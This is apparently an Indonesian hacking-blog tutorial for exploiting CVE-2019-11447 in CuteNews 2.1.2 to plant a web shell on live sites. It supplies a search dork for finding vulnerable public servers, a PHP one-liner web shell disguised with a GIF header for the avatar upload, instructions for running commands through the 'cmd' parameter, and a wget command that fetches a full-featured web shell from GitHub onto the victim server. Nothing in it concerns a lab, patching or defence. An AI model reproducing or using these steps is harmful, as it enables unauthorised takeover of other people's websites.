Menu

CuteNews 2.1.2 - Remote Code Execution

CuteNews 2.1.2 - Remote Code Execution



Hallo kawan - kawan kembali lagi bersama saya, kali ini saya akan memebrikan sebuah tutorial bagaimana cara Upload shell dengan kerentanan yang berada di cms CuteNews dengan memanfaatkan kerentanan Remote Code Execution ( RCE ) ... nah exploit ini sebenernya ditemukan pada tanggal 2020-09-10 rilis di exploit-db .... yaitu kerentanan pada CVE-2019-11447 Oke langsung saja bagaiaman cara memanfaatkan kerentanan ini dengan mengupload shell ....

Tahap 1

Dork : intext:"Powered by CuteNews 2.1.2"

your brain ++

Melaukan Registrasi / pendaftaran



Tahap 2

Klik Personal Options



Tahap 3

Kalian bisa melihat terdaoat file upload / upload gambar / avatar nah disana kerentananya ... oke sebelum mengupload kita harus membuat file dengan code

GIF8;

<?php system($_REQUEST['cmd']) ?>

buat file dengan extensi tentunya .php dan upload pada file upload yang diberi tanda merah ..



Tahap 4

Jika sudah ter upload maka akan terlihat seperti ini yaitu bacaan upload success!


 Tahap 5

Copy image untuk memanggil si shell yang kita upload...


 Tahap 6

Tempel pada tab baru lalu jalankan perintah dengan menambahkan ?cmd={command}

bingung? contoh gambar dibawah..



 Tahap 7

Upload Shell with wget shell link

wget https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php


How To Pangill Shell ?

ya di dir /uploads/ tempat shell cmd kau berada :D hhihihi ... 
Boom!!

Video Youtube


Iklan Tengah Post

Ads middle content1

Ads middle content2